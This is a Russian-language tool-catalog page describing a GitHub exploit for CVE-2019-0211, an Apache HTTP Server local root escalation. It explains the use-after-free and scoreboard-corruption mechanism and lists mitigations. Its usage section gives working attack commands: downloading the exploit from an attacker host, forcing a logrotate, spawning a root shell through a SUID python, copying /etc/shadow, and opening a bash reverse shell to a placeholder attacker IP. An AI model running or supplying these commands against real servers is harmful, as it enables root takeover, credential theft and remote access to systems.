Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2019-0211-exploit | Kitploit
Инструменты/GitHubGitHub/jeanback1/cve-2019-0211-exploit
Повышение привилегийФреймворки для эксплойтовАнализ уязвимостейЭксплуатацияВеб-безопасностьТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной НагрузкиЭксплуатация Бинарных Файлов
GitHubjeanback1/cve-2019-0211-exploit

CVE-2019-0211-exploit

Репозиторий
2 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2019-0211 — Apache HTTP Server Local Privilege Escalation (CARPE DIEM)

Описание

CVE-2019-0211 — это уязвимость локального повышения привилегий, затрагивающая Apache HTTP Server версий 2.4.17–2.4.38 с mod_prefork и mod_php (или PHP-FPM).

Уязвимость позволяет атакующему с shell под пользователем www-data повысить привилегии до root с помощью комбинации Use-After-Free (UAF) в PHP и повреждения scoreboard Apache. Когда Apache выполняет graceful restart (например, при ротации логов в 6:25 утра), он вызывает child_init() до сброса привилегий. Если нам удастся повредить указатель на эту функцию, мы сможем заставить Apache выполнить произвольную команду с правами root.

CVSS 3.1: 7.8 (HIGH) — AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H


Технические детали

ПолеЗначение
CVECVE-2019-0211
ПродуктApache HTTP Server
Затронутые версии2.4.17 – 2.4.38
ТипLocal Privilege Escalation (CWE-269)
ТребованиеShell как www-data, Apache с mod_php, MPM prefork/worker/event
CVSS 3.17.8 HIGH
ПатчApache 2.4.39

Механизм

Apache использует область разделяемой памяти под названием scoreboard, где каждый дочерний worker-процесс имеет структуру process_score с указателем bucket на prefork_child_bucket. Этот bucket содержит apr_proc_mutex_t с указателями на функции (meth->child_init()).

Когда Apache выполняет graceful restart (естественный триггер в 6:25 утра через logrotate), он вызывает child_init() до сброса привилегий. Эксплойт:

  1. Вызывает UAF в PHP, манипулируя объектами DateInterval и JSON-сериализацией
  2. Получает примитив произвольного чтения/записи в памяти
  3. Читает /proc/self/maps, чтобы найти scoreboard (SHM в /dev/zero)
  4. Находит структуру all_buckets в памяти Apache
  5. Перезаписывает buckets payload-ом, который перенаправляет meth->child_init() на system()
  6. При следующем restart Apache выполняет payload как root

Эксплойт

Оригинальный автор

Charles Fol — @cfreal_

Оригинальный пост в блоге: CARPE DIEM — CVE-2019-0211 Apache Local Root

Требования

  • Apache HTTP Server 2.4.17 – 2.4.38 с mod_php (PHP 7.x)
  • Shell как www-data на сервере
  • Возможность записать файл .php в директорию, обслуживаемую Apache

Использование

root@kitploit:~
# 1. Загрузить эксплойт на уязвимый сервер
# С вашей атакующей машины:
python3 -m http.server 8080
# На сервере (как www-data):
cd /var/www/html
wget http://TU_IP:8080/carpediem.php

# 2. Запустить эксплойт
curl http://localhost/carpediem.php

# 3. Дождаться graceful restart Apache
# Вариант A) Дождаться 6:25 утра (автоматический logrotate)
# Вариант B) Принудительно запустить logrotate, если есть права:
sudo /usr/sbin/logrotate /etc/logrotate.conf --force

# 4. Проверить, что python3.5 теперь имеет SUID root
ls -la /usr/bin/python3.5
# Ожидаемый вывод: -rwsr-sr-x 2 root root ...

# 5. Повысить привилегии до root
python3.5 -c 'import os; os.setuid(0); os.system("/bin/bash")'

Кастомный payload

Вы можете изменить команду, выполняемую с правами root, с помощью параметра cmd:

root@kitploit:~
# Пример: сделать копию /etc/shadow
curl "http://localhost/carpediem.php?cmd=cp+/etc/shadow+/tmp/"

# Пример: reverse shell
curl "http://localhost/carpediem.php?cmd=bash+-c+'bash+-i+>%26+/dev/tcp/TU_IP/PUERTO+0>%261'"

Частота успеха

Workers

Больше workers = выше частота успеха.


Митигация

  • Обновить Apache HTTP Server до версии ≥ 2.4.39
  • Перейти с MPM prefork на MPM event (меньшая поверхность атаки на scoreboard)
  • Ограничить доступ к /proc/self/maps с помощью hidef или AppArmor/SELinux

Ссылки

  • NVD — CVE-2019-0211
  • CARPE DIEM Blogpost — Charles Fol
  • Exploit в GitHub — cfreal/exploits
  • Exploit-DB #46676
  • Apache Security Advisories
Скачать инструмент
Успех
Попытки
Неудачи
5 (по умолчанию)87%17726
889%608
1095%704